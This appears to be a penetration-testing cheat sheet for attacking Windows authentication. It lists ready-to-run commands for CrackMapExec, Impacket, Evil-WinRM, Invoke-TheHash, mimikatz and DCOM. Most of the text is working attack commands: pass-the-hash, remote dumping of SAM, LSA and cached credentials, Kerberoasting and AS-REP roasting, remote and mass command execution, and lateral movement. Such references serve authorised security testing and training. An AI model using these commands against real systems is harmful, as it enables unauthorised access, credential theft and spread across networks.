Authentication Mechanisms - Tools
Authentication Mechanisms - Tools
This document provides an overview of essential tools for testing and interacting with various authentication mechanisms in Windows environments.
CrackMapExec (CME)
CrackMapExec is a post-exploitation tool that helps automate assessment of large Active Directory networks.
Basic Usage
# Test credentials against SMB
crackmapexec smb 10.10.10.10 -u username -p password
# Test credentials against WinRM
crackmapexec winrm 10.10.10.10 -u username -p password
# Test credentials against SSH
crackmapexec ssh 10.10.10.10 -u username -p password
# Test credentials against MSSQL
crackmapexec mssql 10.10.10.10 -u username -p passwordPass-the-Hash
# SMB pass-the-hash
crackmapexec smb 10.10.10.10 -u username -H NTLM_HASH
# WinRM pass-the-hash
crackmapexec winrm 10.10.10.10 -u username -H NTLM_HASHAuthentication with Domain
# Specify domain for authentication
crackmapexec smb 10.10.10.10 -u username -p password -d domain.local
# Target a domain controller
crackmapexec smb dc01.domain.local -u username -p password -d domain.localNetwork Sweeping
# Scan subnet for SMB
crackmapexec smb 10.10.10.0/24
# Scan subnet with credentials
crackmapexec smb 10.10.10.0/24 -u username -p passwordEnumeration Functions
# Enumerate shares
crackmapexec smb 10.10.10.10 -u username -p password --shares
# Enumerate logged-on users
crackmapexec smb 10.10.10.10 -u username -p password --loggedon-users
# Enumerate domain users
crackmapexec smb 10.10.10.10 -u username -p password --users
# Enumerate domain groups
crackmapexec smb 10.10.10.10 -u username -p password --groups
# Get password policy
crackmapexec smb 10.10.10.10 -u username -p password --pass-polCommand Execution
# Execute command via SMB
crackmapexec smb 10.10.10.10 -u username -p password -x "whoami /all"
# Execute PowerShell command
crackmapexec smb 10.10.10.10 -u username -p password -X '$PSVersionTable'Impacket
Impacket is a collection of Python classes for working with network protocols, particularly useful for Windows authentication.
PSExec
# Authenticate with password
impacket-psexec domain.local/username:password@10.10.10.10
# Pass-the-hash
impacket-psexec -hashes :NTLM_HASH domain.local/username@10.10.10.10
# Specify command to run
impacket-psexec domain.local/username:password@10.10.10.10 'ipconfig /all'WMIExec
# Authenticate with password
impacket-wmiexec domain.local/username:password@10.10.10.10
# Pass-the-hash
impacket-wmiexec -hashes :NTLM_HASH domain.local/username@10.10.10.10SMBExec
# Authenticate with password
impacket-smbexec domain.local/username:password@10.10.10.10
# Pass-the-hash
impacket-smbexec -hashes :NTLM_HASH domain.local/username@10.10.10.10Secretsdump
# Remote dumping of hashes
impacket-secretsdump domain.local/username:password@10.10.10.10
# Pass-the-hash
impacket-secretsdump -hashes :NTLM_HASH domain.local/username@10.10.10.10
# SAM + LSA + Cached creds
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCALGetNPUsers
# Get users without Kerberos pre-authentication
impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -usersfile users.txt -format hashcat
# With specific user
impacket-GetNPUsers domain.local/username -dc-ip 10.10.10.10GetUserSPNs
# Kerberoasting - request service tickets
impacket-GetUserSPNs domain.local/username:password -dc-ip 10.10.10.10 -request
# Output in specific format
impacket-GetUserSPNs domain.local/username:password -dc-ip 10.10.10.10 -request -format hashcatEvil-WinRM
Evil-WinRM is a WinRM shell for pentesting/hacking Windows Remote Management.
Basic Usage
# Connect with password
evil-winrm -i 10.10.10.10 -u username -p password
# Pass-the-hash
evil-winrm -i 10.10.10.10 -u username -H NTLM_HASH
# Specify domain
evil-winrm -i 10.10.10.10 -u username@domain.local -p passwordAdvanced Features
# Load PowerShell scripts
evil-winrm -i 10.10.10.10 -u username -p password -s /path/to/ps_scripts/
# Upload file
# (After connecting, use upload command)
*Evil-WinRM> upload /local/path/file.exe C:\Windows\Temp\file.exe
# Download file
*Evil-WinRM> download C:\Windows\Temp\file.exe /local/path/file.exe
# PowerShell menu
*Evil-WinRM> menu
# Launch PowerShell commands without touching disk
*Evil-WinRM> Invoke-Binary /path/to/binary.exeInvoke-TheHash
Invoke-TheHash provides PowerShell functions for performing pass-the-hash attacks with WMI and SMB.
Installation
# Import the module
Import-Module .\Invoke-TheHash.psd1SMB Command Execution
# Execute command via SMB using NTLM hash
Invoke-SMBExec -Target 10.10.10.10 -Domain domain.local -Username username -Hash NTLM_HASH -Command "whoami" -Verbose
# Get command output
Invoke-SMBExec -Target 10.10.10.10 -Domain domain.local -Username username -Hash NTLM_HASH -Command "whoami" -CommandOutput $true -VerboseWMI Command Execution
# Execute command via WMI using NTLM hash
Invoke-WMIExec -Target 10.10.10.10 -Domain domain.local -Username username -Hash NTLM_HASH -Command "whoami" -VerboseMass Command Execution
# Execute on multiple targets via SMB
$targets = Get-Content .\targets.txt
foreach($target in $targets) {
Invoke-SMBExec -Target $target -Domain domain.local -Username username -Hash NTLM_HASH -Command "whoami" -Verbose
}Lateral Movement Techniques
RDP with Stolen Credentials
# Using xfreerdp
xfreerdp /v:10.10.10.10 /u:username /p:password /d:domain.local +clipboard
# Pass-the-hash with mimikatz
sekurlsa::pth /user:username /domain:domain.local /ntlm:NTLM_HASH /run:"mstsc /restrictedadmin"DCOM Lateral Movement
# Create COM object for remote execution
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
# Execute command
$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami > C:\Windows\Temp\output.txt", "7")Common Troubleshooting
# Verify SMB connectivity
crackmapexec smb 10.10.10.10 --shares
# Check for WinRM connectivity
crackmapexec winrm 10.10.10.10
# Test credential validity without execution
crackmapexec smb 10.10.10.10 -u username -p passwordLast updated